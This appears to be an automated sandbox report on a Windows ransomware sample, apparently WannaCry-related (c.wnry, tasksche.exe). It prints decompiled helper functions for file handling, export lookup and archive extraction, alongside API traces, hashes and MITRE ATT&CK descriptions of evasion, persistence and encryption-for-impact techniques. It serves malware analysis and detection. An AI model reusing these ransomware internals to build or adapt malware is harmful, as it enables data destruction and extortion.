							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}

0x00405bb2
0x00405bbb
0x00405bd2
0x00405bd7
0x00405bdc
0x00405bdf
0x00405be1
0x00405be4
0x00405c18
0x00405c1b
0x00405c24
0x00405c29
0x00405c32
0x00405c36
0x00405c36
0x00405c38
0x00405c42
0x00405c44
0x00405c6c
0x00405c6f
0x00405c72
0x00405c77
0x00405c7a
0x00405c7d
0x00405c80
0x00405c83
0x00405c90
0x00405c90
0x00405c4c
0x00405c4f
0x00405c51
0x00405c57
0x00405c5b
0x00405c5e
0x00405c61
0x00405c64
0x00405c64
0x00405c96
0x00405c98
0x00000000
0x00405c98
0x00405be9
0x00000000
0x00000000
0x00405c04
0x00405c09
0x00405c20
0x00000000
0x00405c20
0x00405c0b
0x00000000
0x00405bc7
0x00405bca
0x00405c11
0x00405c11
0x00405c9a
0x00405c9e
0x00405c9e

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$Pointer$??2@Create
String ID:
API String ID: 1331958074-0
Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

0x00402928
0x0040292f
0x00402934
0x00402938
0x0040293e
0x004029a5
0x004029a7
0x004029ad
0x00402940
0x00402940
0x00402942
0x00402946
0x0040294a
0x00000000
0x00402951
0x00402951
0x0040295a
0x00402971
0x00402973
0x00402977
0x0040297a
0x00000000
0x0040297c
0x00402981
0x00402983
0x00402986
0x00402989
0x00402993
0x00000000
0x00000000
0x00402995
0x00402998
0x0040299f
0x004029a3
0x0040297e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004029a3
0x004029b4
0x004029b7
0x00000000
0x004029b7
0x0040295c
0x0040295c
0x0040295c
0x00402960
0x00402965
0x00000000
0x00402967
0x00402967
0x004029ba
0x004029bd
0x00000000
0x004029bf
0x004029c8
0x004029c8
0x004029bd
0x00402965
0x0040295a
0x0040294a
0x004029af
0x004029b3

APIs

_stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7

Strings

P!@, xrefs: 00402951, 00402986, 0040295C

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast_stricmp
String ID: P!@
API String ID: 1278613211-1774101457
Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}

0x00401dfe
0x00401e00
0x00401e05
0x00401e0e
0x00401e1a
0x00401e21
0x00401e2d
0x00401e32
0x00401e38
0x00401e3b
0x00401e3f
0x00401e41
0x00401e4a
0x00401e5b
0x00401e60
0x00401e65
0x00401e82
0x00401e87
0x00401e87
0x00401e8a
0x00401e8b
0x00401e41
0x00401e90
0x00401e96
0x00401e98
0x00401e07
0x00401e07
0x00401e9d

APIs

strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
GetFileAttributesA.KERNEL32(?), ref: 00401E6E

Strings

c.wnry, xrefs: 00401E55

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesFilestrcmp
String ID: c.wnry
API String ID: 3324900478-3240288721
Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00405ca0
0x00405ca6
0x00405cb1
0x00405cb6
0x00405cb6
0x00405cbc
0x00405cbd
0x00405cc6
0x00405ca8
0x00405cac
0x00405cac

APIs

CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD

Strings

$l@, xrefs: 00405C9F

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??3@CloseHandle
String ID: $l@
API String ID: 3816424416-2140230165
Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC

Uniqueness

Uniqueness Score: -1.00%

Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}

0x004019e5
0x004019ec
0x00401a19
0x00000000
0x00401a19
0x004019ee
0x004019f2
0x00401a08
0x00401a10
0x00401a11
0x00401a1d
0x00401a2c
0x00401a3a
0x00401a3e
0x00000000
0x00401a3e
0x00401a13
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CriticalSection$Leave$Entermemcpy
String ID:
API String ID: 3435569088-0
Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report stN592INV6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\tasksche.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
stN592INV6.exe

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
networkCOMMON

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
networkCOMMON

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
COMMON

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON